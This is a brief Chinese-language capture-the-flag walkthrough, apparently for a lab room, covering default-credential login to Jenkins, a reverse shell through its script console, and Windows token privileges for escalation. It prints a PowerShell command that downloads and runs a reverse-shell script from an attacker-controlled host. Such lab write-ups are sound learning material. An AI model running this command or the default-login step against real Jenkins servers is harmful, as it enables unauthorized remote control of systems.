简介:

利用 Jenkins 获取初始 shell，然后利用 Windows 身份验证令牌提升您的权限。

Task 1

简单nmap扫一扫

可以看出开了三个端口
访问8080，来到Jenkins的登录口，尝试密码 admin admin 成功登录

jenkins后台有个能shell的点，在manage里面

下面翻到脚本管理器

输入以下代码：

println "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.234.74:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.234.74 -Port 4646".execute().text

成功反弹shell

成功找到flag

根据提示反弹一个msf的shell

查看特权令牌

这里发现SeDebugPrivilege SeChangeNotifyPrivilege和SeImpersonatePrivilege的SeCreateGlobalPrivilege状态设置为“已启用”。
后续就跟着步骤来